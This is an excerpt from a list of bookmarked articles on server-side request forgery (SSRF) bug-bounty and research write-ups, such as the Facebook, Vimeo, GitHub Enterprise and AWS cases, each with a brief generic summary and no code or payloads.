| 820 | 2022-10-13 02:38:32 UTC | Vimeo SSRF with code execution potential. | The content discusses a security vulnerability in Vimeo known as Server-Side Request Forgery (SSRF) with the potential for code execution. The vulnerability could allow attackers to manipulate server requests and potentially execute malicious code. The link provided likely leads to more detailed information about this security issue. It is crucial for Vimeo to address and patch this vulnerability to prevent exploitation by malicious actors. |
| 821 | 2022-10-12 03:13:18 UTC | SSRF (Server Side Request Forgery) testing resources | The content discusses resources for testing SSRF (Server Side Request Forgery) vulnerabilities. SSRF is a security vulnerability that allows attackers to send crafted requests from a server, potentially leading to unauthorized access or data leakage. The provided link likely offers tools, techniques, or guidance for testing and mitigating SSRF vulnerabilities to enhance the security of web applications. |
| 822 | 2022-10-12 03:13:16 UTC | Server-Side Request Forgery | The content appears to be about Server-Side Request Forgery (SSRF), a security vulnerability where an attacker can manipulate a server into making unintended requests. SSRF can lead to data leaks, unauthorized access, and potential server exploitation. It is crucial for developers to be aware of SSRF risks and implement proper security measures to prevent such attacks. The link provided may offer more in-depth information on SSRF and how to protect against it. |
| 823 | 2022-10-12 03:13:14 UTC | Multiple HTTP Redirects to Bypass SSRF Protections | The content discusses a technique involving multiple HTTP redirects to circumvent Server-Side Request Forgery (SSRF) protections. This method utilizes a series of redirects to trick a server into accessing unintended resources, potentially bypassing security measures. It highlights a vulnerability that attackers could exploit to manipulate servers into making requests to unauthorized destinations. This technique poses a risk to systems relying on SSRF defenses, emphasizing the importance of implementing robust security measures to prevent such attacks. |
| 824 | 2022-08-02 13:58:25 UTC | A Glossary of Blind SSRF Chains | The content is a glossary of blind Server-Side Request Forgery (SSRF) chains discovered by Assetnote. It provides a comprehensive list of terminologies related to SSRF vulnerabilities, explaining each term in detail. The glossary aims to help readers understand the concepts and techniques associated with blind SSRF attacks. |
| 825 | 2021-10-08 19:31:48 UTC | Finding SSRF via HTML Injection inside a PDF file on AWS EC2 | by Riyaz Wal | The article discusses how Server-Side Request Forgery (SSRF) can be exploited through HTML injection in a PDF file on AWS EC2, leading to data theft from AWS accounts. It highlights the risk by mentioning Capital One's loss of over 100 million bank records due to a similar issue. SSRF vulnerabilities can have severe consequences, emphasizing the importance of addressing and securing such vulnerabilities to prevent unauthorized access and data breaches. |
| 826 | 2021-04-15 13:41:57 UTC | Story of a really cool SSRF bug.. Hello all! My name is Vedant, also… | by | Vedant, also known as Vegeta on Twitter, is a cybersecurity enthusiast and bug bounty hunter. He shares a story about discovering a significant Server-Side Request Forgery (SSRF) bug. This bug showcases his skills in identifying vulnerabilities and his passion for cybersecurity. |
| 827 | 2021-04-10 13:56:59 UTC | $10000 Facebook SSRF (Bug Bounty) | by Amine Aboud | Medium | The content discusses a bug bounty reward of $10,000 for a blind Server-Side Request Forgery (SSRF) vulnerability found on Facebook. The process involved subdomain enumeration, file bruteforcing, and code review to identify the SSRF issue. The author, Amine Aboud, highlights the methodology used to discover the vulnerability and emphasizes the importance of thorough testing to uncover such security flaws. |
| 828 | 2019-08-23 11:27:41 UTC | SSRF in the Wild | The content discusses SSRF (Server-Side Request Forgery) vulnerabilities found in real-world scenarios. It emphasizes that the analysis is not based on scientific methods but rather focuses on the prevalence of SSRFs in practical situations. The term "in the wild" suggests that these vulnerabilities are encountered in real-world environments rather than just theoretical discussions. The content likely provides insights into the frequency and impact of SSRF vulnerabilities discovered outside controlled testing environments. |
| 829 | 2019-04-20 07:00:40 UTC | PDFReacter SSRF to ROOT Level Local File Read which led to RCE | PDFReacter is a parser that converts HTML content to PDF. |
| 830 | 2018-10-16 03:44:51 UTC | AWS takeover through SSRF in JavaScript – Gwendal Le Coguic | The content seems to focus on the potential security risk of Server-Side Request Forgery (SSRF) vulnerabilities in JavaScript applications that could lead to an AWS takeover. SSRF allows attackers to manipulate a server into making requests to unintended destinations, potentially gaining control over AWS resources. This type of attack highlights the importance of securing applications against SSRF vulnerabilities to prevent unauthorized access and misuse of cloud services like AWS. |
| 831 | 2018-09-15 19:31:32 UTC | Into the Borg – SSRF inside Google production network | OpnSec | In March 2018, a security researcher found an XSS vulnerability in Google Caja, a tool for embedding html/javascript securely. The issue was reported to Google and fixed in May 2018. The researcher tested Google Sites and Google Caja, discovering the vulnerability within Google's production network. The article discusses the process of identifying and reporting the XSS vulnerability, highlighting the importance of security testing in large-scale systems like Google's. |
| 832 | 2018-06-27 20:35:03 UTC | Server Side Request Forgery (SSRF) Testing | The content discusses Server Side Request Forgery (SSRF) testing for fun rather than for a bounty. The author discovered a vulnerable website to SSRF but did not elaborate on the exploitation process. |
| 833 | 2018-06-15 19:26:38 UTC | How i converted SSRF TO XSS in jira. | The content discusses the author's interest in bug bounty hunting and their focus on finding vulnerabilities like Server-Side Request Forgery (SSRF) and Cross-Site Scripting (XSS) in Jira. The author shares their experience of converting SSRF into XSS, highlighting their dedication to discovering new vulnerabilities and improving their reconnaissance skills. |
| 834 | 2018-06-07 16:19:17 UTC | How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! | The content appears to be a brief introduction with minimal information provided. It mentions chaining four vulnerabilities on GitHub Enterprise, starting from SSRF execution to achieving Remote Code Execution (RCE). The author is identified as 🍊. |